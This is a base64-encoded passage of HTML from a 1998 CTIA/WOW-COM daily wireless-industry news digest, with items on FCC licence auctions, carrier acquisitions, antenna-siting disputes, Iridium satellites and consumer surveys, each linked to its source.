RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMjAsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkZDQyB0byBSZS1BdWN0aW9uIFNvbWUK
Qy1CbG9jayBXaXJlbGVzcyBQaG9uZSBMaWNlbnNlczwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgRmVkZXJhbCBD
b21tdW5pY2F0aW9ucyBDb21taXNzaW9uCnNhaWQgaXQgd291bGQgcmUtYXVj
dGlvbiBhbiBlc3RpbWF0ZWQgMjY0IGxpY2Vuc2VzIG9uIE1hcmNoIDIzLCAx
OTk5LiAoPEEgSFJFRj0iaHR0cDovL3d3dy5uYW5kb3RpbWVzLmNvbS9uZXdz
cm9vbS9udG4vYml6LzA4MjA5OC9iaXo0XzE5NDYzLmh0bWwiPk5BTkRPClRJ
TUVTIE5FV1M8L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vd3d3LmZjYy5nb3Yv
QnVyZWF1cy9XaXJlbGVzcy9OZXdzX1JlbGVhc2VzLzE5OTgvbnJ3bDgwMzYu
aHRtbCI+RkNDPC9BPikKLSAoPEEgSFJFRj0iaHR0cDovL3d3dy5jaGFybG90
dGUuY29tL2NsaWNrL3dpcmV0ZWNoL3B1Yi8wMTg5MDIuaHRtIj5DSEFSTE9U
VEUKT0JTRVJWRVI8L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vZGFpbHluZXdz
LnlhaG9vLmNvbS9oZWFkbGluZXMvYXAvd2FzaGluZ3Rvbi9zdG9yeS5odG1s
P3M9di9hcC85ODA4MTkvd2FzaGluZ3Rvbi9zdG9yaWVzL2FpcndhdmVzX2F1
Y3Rpb25fMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlJhbmdlciBXaXJl
bGVzcyBTb2x1dGlvbnMKQWNxdWlyZXMgTW9iaUxpbmsgQXNzZXRzPC9GT05U
PjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlJhbmdl
ciBXaXJlbGVzcyBTb2x1dGlvbnMsIGEgc2VydmljZXMKZGV2ZWxvcG1lbnQg
Y29tcGFueSBmb2N1c2VkIHByaW1hcmlseSBvbiB3aXJlbGVzcyByb2FtaW5n
LCBhbm5vdW5jZWQgdGhhdAppdCBpcyBhY3F1aXJpbmcgTW9iaUxpbmssIGEg
ZGV2ZWxvcG1lbnQgY29tcGFueSBvd25lZCBieSBhIGNvbnNvcnRpdW0gb2YK
c2V2ZW4gd2lyZWxlc3Mgc2VydmljZSBwcm92aWRlcnMuJm5ic3A7IFRlcm1z
IG9mIHRoZSB0cmFuc2FjdGlvbiB3ZXJlIG5vdApkaXNjbG9zZWQuICg8QSBI
UkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lv
bmFsL25ld3MvZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTMyNTIiPldPVy1D
T008L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5PbmUtUmF0ZSBQbGFuIEhlbHBpbmcKQVQmYW1w
O1QgV2luIGluIFdpcmVsZXNzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkluIGFuIGludGVydmlldyB3aXRoIEludmVz
dG9yJ3MgQnVzaW5lc3MKRGFpbHksIEFUJmFtcDtUIFdpcmVsZXNzIFNlcnZp
Y2VzIENFTyBEYW4gSGVzc2Ugc2FpZCB0aGF0IHRoZSB3aXJlbGVzcwpkaXZp
c2lvbidzIHN1Y2Nlc3MgZHVyaW5nIHRoZSBsYXN0IHF1YXJ0ZXIgd2FzIGxh
cmdlbHkgZHVlIHRvIHRoZSBvbmUgcmF0ZQpwbGFuLiBTZWNvbmQtcXVhcnRl
ciBzYWxlcyBpbiB0aGUgd2lyZWxlc3MgZGl2aXNpb24gZ3JldyAxMS40IHBl
cmNlbnQgdG8KJDEuMjQgYmlsbGlvbiBmcm9tIHRoZSBwcmV2aW91cyB5ZWFy
LiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3By
b2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMjUz
Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TGVvbiBDb3VudHksIEZsb3JpZGEK
UmVzaWRlbnRzIFJhbGx5IEFnYWluc3QmbmJzcDs8QlI+CkJlbGxTb3V0aCBB
bnRlbm5hIFNpdGU8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+QmVsbFNvdXRoJ3MgcHJvcG9zYWwgdG8gY29uc3RydWN0
IGEgMTMwLWZvb3QKdG93ZXIgaW4gYSA5NS1hY3JlIHdvb2RlZCBhcmVhIGlu
IExlb24gQ291bnR5LCBGbGEuLCBoYXMgYmVlbiBtZXQgd2l0aApyZXNpc3Rh
bmNlIGZyb20gbmVhcmx5IDYwIHJlc2lkZW50cy4gQWx0aG91Z2ggQmVsbFNv
dXRoIGhhcyBub3QgeWV0IGFwcGxpZWQKZm9yIHBlcm1pc3Npb24gdG8gYnVp
bGQgdGhlIHRvd2VyLCBhbmQgY29tcGFueSByZXByZXNlbnRhdGl2ZXMgc2F5
IHRoZXkKZG8gbm90IGtub3cgd2hlbiBhbiBhcHBsaWNhdGlvbiB3aWxsIGJl
IGZpbGVkLCByZXNpZGVudHMgaGF2ZSBiZWd1biBhbgpvcHBvc2l0aW9uIHJh
bGx5LCBjb21wbGV0ZSB3aXRoIHByaW50ZWQgc2lnbnMgYW5kIGFuIGF0dG9y
bmV5IG9uIHJldGFpbmVyLgooPEEgSFJFRj0iaHR0cDovL3d3dy50ZG8uY29t
L25ld3MvYnJlYWtpbmcvZG9jcy8yMFRPV0VSLUNNUC1OV1MuaHRtIj5UQUxM
QUhBU1NFRQpERU1PQ1JBVDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkhhcndpY2gsIE1hc3Nh
Y2h1c2V0dHMKQ2l0aXplbnMgVm9pY2UgQ29uY2VybnMgYWJvdXQgQW50ZW5u
YXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+VG93biByZXNpZGVudHMgYXR0ZW5kaW5nIGEgcHVibGljIGhlYXJpbmcK
c2F5IHRoZXkgZG9uJ3Qgd2FudCBhbnRlbm5hcyBvbiB3YXRlciB0b3dlcnMg
b3Igb24gY29uc2VydmF0aW9uIGxhbmQuICg8QSBIUkVGPSJodHRwOi8vd3d3
LmNhcGVjb2RvbmxpbmUuY29tL2NjdGltZXMvdG93ZXIyMC5odG0iPkNBUEUK
Q09EIFRJTUVTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Q29yc2FpciBBbm5vdW5jZXMgTmV3
CldpcmVsZXNzIExvY2F0aW9uIFN5c3RlbTwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgUGhvbmVUcmFjayhUTSkg
c3lzdGVtIHdpbGwgdXNlIGVsZW1lbnRzCm9mIHRpbWUgZGlmZmVyZW5jZSBv
ZiBhcnJpdmFsIChURE9BKSBhbmQgYW5nbGUgb2YgYXJyaXZhbCAoQU9BKSB0
ZWNobm9sb2dpZXMKdG8gbG9jYXRlIHdpcmVsZXNzIHBob25lcyBhbmQgb3Ro
ZXIgZGV2aWNlcyBmb3IgY29tbWVyY2lhbCBhcHBsaWNhdGlvbnMKc3VjaCBh
cyBsb2NhdGlvbi1zZW5zaXRpdmUgYmlsbGluZywgcm9hZHNpZGUgYXNzaXN0
YW5jZSBhbmQgZW5oYW5jZWQgaW5mb3JtYXRpb24Kc2VydmljZXMsIGFzIHdl
bGwgYXMgRS05MTEgY2FsbHMuIFRoZSBzeXN0ZW0gaXMgYmVpbmcgZGVzaWdu
ZWQgaW5pdGlhbGx5CmZvciB0aGUgQU1QUyBhbmQgVERNQSAoSVMtMTM2KSBw
cm90b2NvbHMsIHdpdGggbGF0ZXIgbWlncmF0aW9uIHRvIG90aGVyCmRpZ2l0
YWwgcHJvdG9jb2xzLiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20v
YncvOTgwODE5L2NvcnNhaXJfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PkRlbG9pdHRlIENvbnN1bHRpbmcgYW5kCkVscmljayAmYW1wOyBMYXZpZGdl
IFJlbGVhc2UmbmJzcDs8QlI+CkNvbnN1bWVyIFN1cnZleTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgc3VydmV5
IHJldmVhbGVkIHZpcnR1YWwgYWNyb3NzLXRoZS1ib2FyZApkZWNsaW5lcyBp
biBvdmVyYWxsIHNhdGlzZmFjdGlvbiBzY29yZXMgZm9yIHdpcmVsZXNzLCBv
bmxpbmUsIGNhYmxlLCBsb2NhbAphbmQgbG9uZyBkaXN0YW5jZSBzZXJ2aWNl
cyBiZXR3ZWVuIGZhbGwgMTk5NyBhbmQgc3ByaW5nIDE5OTguIFRoZSBnb29k
Cm5ld3MgaXMgdGhhdCB0ZWNobm9sb2d5IGFkb3B0aW9uIGNvbnRpbnVlcyB0
byByaXNlIGFuZCBkZW1hbmQgZm9yIGJ1bmRsZWQKc2VydmljZXMgaXMgZ3Jv
d2luZy4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29tL3By
bmV3cy85ODA4MTkvYXRfdGVsY29fc18xLmh0bWwiPllBSE9PPC9BPik8L0ZP
TlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9KzE+SW5kZXBlbmRlbnQgU3R1ZHkgR2l2ZXMKQWlyVG91Y2gncyBEaWdp
dGFsIE5ldHdvcmsmbmJzcDs8QlI+CkhpZ2ggUmF0aW5ncyBmb3IgU2Vydmlj
ZSBpbiBTYW4gRGllZ288L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+RW1lcmFsZCBCYXksIGFuIGluZGVwZW5kZW50IHJl
c2VhcmNoIGNvbXBhbnksCnB1cmNoYXNlZCBwaG9uZXMgZnJvbSBmb3VyIHdp
cmVsZXNzIGNhcnJpZXJzIGluIFNhbiBEaWVnbywgdGhlbiBkcm92ZSB0aHJv
dWdob3V0CnRoZSBhcmVhIHBsYWNpbmcgbmVhcmx5IDksMDAwIGNhbGxzIGRp
dmlkZWQgZXF1YWxseSBhbW9uZyB0aGUgZGlmZmVyZW50CmNhcnJpZXJzJyBz
eXN0ZW1zLiBTaXggc3lzdGVtcyB3ZXJlIGV2YWx1YXRlZDogQWlyVG91Y2gn
cyBkaWdpdGFsIGFuZCBhbmFsb2cKbmV0d29ya3MsIEdURSdzIGRpZ2l0YWwg
YW5kIGFuYWxvZyBuZXR3b3JrcywgYW5kIFBhY2lmaWMgQmVsbCdzIGFuZCBT
cHJpbnQncwpkaWdpdGFsIG5ldHdvcmtzLiAoPEEgSFJFRj0iaHR0cDovL2Jp
ei55YWhvby5jb20vYncvOTgwODIwL2FpcnRvdWNoX2NfMS5odG1sIj5ZQUhP
TzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPklyaWRpdW0gTGF1bmNoZXMgVHdvCk1vcmUgU2F0
ZWxsaXRlczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5UaGUgc2F0ZWxsaXRlcyBhcmUgcmVwbGFjZW1lbnRzIGZvciB0
d28KdGhhdCBtYWxmdW5jdGlvbmVkIHdoaWxlIGluIG9yYml0LiZuYnNwOyBJ
cmlkaXVtIHBsYW5zIHRvIGludHJvZHVjZSBpdHMKd2lyZWxlc3MgcGhvbmVz
IHNlcnZpY2UgaW4gU2VwdGVtYmVyLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5u
ZXdzYnl0ZXMuY29tL3RlbGVjb20vMTE2NzQ2Lmh0bWwiPk5FV1NCWVRFUzwv
QT4pCi0gKDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29tL2ZpbmFuY2Uv
OTgwODIwL2NoaW5hX3NhdGVfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PlRlbGVnbG9iZSBBd2FyZGVkIElyaWRpdW0KUENTIFJvYW1pbmcgQ29udHJh
Y3Q8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+SXJpZGl1bSBMTEMgd2lsbCB1c2UgVGVsZWdsb2JlJ3MgR2xvYmVQQ1Mo
U00pCnNpZ25hbGluZyBjb252ZXJzaW9uIHBsYXRmb3JtIHRvIHByb3ZpZGUg
aXRzIHN1YnNjcmliZXJzIHdpdGggc2VhbWxlc3MKcm9hbWluZyB0byBhbmQg
ZnJvbSBOb3J0aCBBbWVyaWNhLiBUZWxlZ2xvYmUgbGF1bmNoZWQgaXRzIEds
b2JlUENTIHJvYW1pbmcKc2VydmljZSAxNCBtb250aHMgYWdvLiZuYnNwOyAo
PEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vYncvOTgwODE5L3RlbGVn
bG9iZV8xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+UGVzc2ltaXNtIFJ1
bGVzIEF0IFkySwpDb25mZXJlbmNlPC9GT05UPjwvRk9OVD48L0I+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlJlcC4gRGF2aWQgRHJlaWVyIChSLUNh
bGlmLiksIHRvbGQgcGFydGljaXBhbnRzCmhlIGRvZXNuJ3QgZm9yZXNlZSB0
aGUgaW1taW5lbnQgcGFzc2FnZSBvZiBhIGJpbGwgdG8gbGltaXQgY29tcGFu
aWVzJyBsZWdhbApsaWFiaWxpdHkgZm9yIHByb2JsZW1zIGNhdXNlZCBieSB0
aGUgYnVnLiAoPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS93aXJl
L3N0b3J5L1RXQjE5OTgwODE5UzAwMTMiPlRFQ0hXRUI8L0E+KTwvRk9OVD48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
Uj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0r
MT5XaW5TdGFyIE5ldyBNZWRpYSBTaWducwpBZ3JlZW1lbnQgd2l0aCBZYWhv
byE8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+V2luU3RhciBOZXcgTWVkaWEsIGEgc3Vic2lkaWFyeSBvZiBXaW5TdGFy
CkNvbW11bmljYXRpb25zLCB3aWxsIFN1cHBseSBPZmZpY2UuY29tLCBhIHJl
c291cmNlIG9uIHRoZSBJbnRlcm5ldCBkZXNpZ25lZAp0byBtZWV0IHRoZSBu
ZWVkcyBvZiBzbWFsbCBidXNpbmVzc2VzLiAoPEEgSFJFRj0iaHR0cDovL3d3
dy5ibG9vbWJlcmcuY29tL25ld3MyLmNnaT9UPXRlY2huZXdzLmh0JnM9NTgz
OTcwNzYxIj5CTE9PTUJFUkcKVEVDSE5PTE9HWSBORVdTPC9BPik8L0ZPTlQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
KzE+R1BTIEZpcm0sIFRyaW1ibGUsIFJlYWxpZ25zCkxlYWRlcnNoaXA8L0ZP
TlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+RHIu
IFJvYmVydCBDb29wZXIsIHByZXNpZGVudCBvZiBBdGxhbnRpYwpBZXJvc3Bh
Y2UgRWxlY3Ryb25pY3MgQ29ycG9yYXRpb24gb2YgR3JlZW5iZWx0LCBNZC4s
IGJlY29tZXMgY2hhaXJtYW4gb2YKdGhlIGJvYXJkIG9mIGRpcmVjdG9ycy4m
bmJzcDsgQ29tcGFueSBmb3VuZGVyIENoYXJsZXMgUi4gVHJpbWJsZSBzdGVw
cwpkb3duIGZyb20gdGhlIHBvc2l0aW9uIG9mIHByZXNpZGVudCBhbmQgQ0VP
LiZuYnNwOyBXaGlsZSB0aGUgY29tcGFueSBzZWFyY2hlcwpmb3IgYSByZXBs
YWNlbWVudCwgRHIuIEJyYWRmb3JkIFBhcmtpbnNvbiB3aWxsIGJlIGFjdGlu
ZyBwcmVzaWRlbnQgYW5kCkNFTy4gKDxBIEhSRUY9Imh0dHA6Ly93d3cuYmxv
b21iZXJnLmNvbS9uZXdzMi5jZ2k/VD10ZWNobmV3cy5odCZzPTU4Mzg5MDk2
MSI+QkxPT01CRVJHClRFQ0hOT0xPR1kgTkVXUzwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkVy
aWNzc29uIEFjcXVpcmVzIEVkZ2Vjb20sCmEgVGVsZWNvbW11bmljYXRpb25z
Jm5ic3A7PEJSPgpDb25zdWx0aW5nIEZpcm08L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+SW4gYSBkZWFsIGFpbWVkIGF0
IHN1cHBvcnRpbmcgdGhlIGdyb3d0aApvZiBFcmljc3NvbiBNb2JpbGUncyBi
dXNpbmVzcyBjb25zdWx0aW5nIHNlcnZpY2VzIHRocm91Z2hvdXQgdGhlIHdv
cmxkLApFZGdlY29tIHdpbGwgcHJvdmlkZSBuZXcgbmV0d29yayBsaWNlbnNl
IGhvbGRlcnMgd2l0aCBjb21wcmVoZW5zaXZlIGtub3dsZWRnZQphbmQgcmFw
aWQgbWFya2V0IGVudHJ5LiBFZGdlY29tIHdpbGwgYWxzbyBzZXJ2ZSBvcGVy
YXRvcnMgd2hvIGRvIG5vdCBjdXJyZW50bHkKdXNlIEVyaWNzc29uIGVxdWlw
bWVudCBhbmQgYXJlIHNlZWtpbmcgdG8gZGV2ZWxvcCBidXNpbmVzcyBvcHBv
cnR1bml0aWVzCmluIHN0cmF0ZWd5LCBvcmdhbml6YXRpb24sIHByb2Nlc3Nl
cyBhbmQgc3lzdGVtcy4gKDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFob28uY29t
L2J3Lzk4MDgyMC9lcmljc3Nvbl8xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
KzE+VSBTIFdFU1QsIFVuaW9uIE5lZ290aWF0b3JzCnRvIFJlc3VtZSBUYWxr
cyBUb2RheTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5BZnRlciBtZWV0aW5nIGZvciBmb3VyIGhvdXJzIG9uIFdlZG5l
c2RheSwKdGhlIHR3byBzaWRlcyBoYXZlIGFncmVlZCB0byBtZWV0IGFnYWlu
IHRvZGF5LiBUaGUgc3RpY2tpbmcgcG9pbnRzIHJlbWFpbgphIHBlcmZvcm1h
bmNlLXBheSBwbGFuLCBtYW5kYXRvcnkgb3ZlcnRpbWUgYW5kIGhlYWx0aCBj
YXJlIGJlbmVmaXRzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5uYW5kb3RpbWVz
LmNvbS9uZXdzcm9vbS9udG4vYml6LzA4MTk5OC9iaXoxMF8xNTU3Lmh0bWwi
Pk5BTkRPClRJTUVTIE5FV1M8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5QdWJsaWMgVXNlIG9m
IE1vYmlsZQpQaG9uZXMgQW5ub3kgNzUgUGVyY2VudCBvZiBQZW9wbGUsJm5i
c3A7PEJSPgpTYXlzIFN1cnZleSBpbiBKYXBhbidzIExhcmdlIENpdGllczwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5B
IHN1cnZleSBjb25kdWN0ZWQgYnkgSmFwYW4ncyBUZWxlY29tbXVuaWNhdGlv
bnMKQ2FyZWVycyBBc3NvY2lhdGlvbiBmaW5kcyB0aGF0IGNlbGx1bGFyIHBo
b25lIHVzZSBpbiBwdWJsaWMgbG9jYXRpb25zIGhhcwpib3RoZXJlZCA3NSBw
ZXJjZW50IG9mIHJlc3BvbmRlbnRzLCBwcmltYXJpbHkgYmVjYXVzZSB0aGUg
c3BlYWtlciBpcyB0YWxraW5nCmxvdWRseS4gVGhlIDEsMzAwIHJlc3BvbmRl
bnRzLCBhZ2VzIDE2IHRvIDk2LCB3ZXJlIGZyb20gVG9reW8gYW5kIGVpZ2h0
Cm90aGVyIGxhcmdlIGNpdGllcy4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud293
LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4
LmNmbT9hcnRpY2xlaWQ9MzI2NiI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkJl
bGwgQ2FuYWRhIEludGVybmF0aW9uYWwKYW5kIEEuSS5HLiBpbiBLb3JlYW4g
UENTIERlYWw8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+QmVsbCBDYW5hZGEgSW50ZXJuYXRpb25hbCBhbmQgdGhlIEFt
ZXJpY2FuCkludGVybmF0aW9uYWwgR3JvdXAsIGEgYmlnIGluc3VyZXIgaW4g
TmV3IFlvcmssIGpvaW5lZCBmb3JjZXMgb24gVHVlc2RheQp0byBwdXJjaGFz
ZSAzOS40IHBlcmNlbnQgb2YgdGhlIEhhbnNvbCBQQ1MgQ29tcGFueSBvZiBT
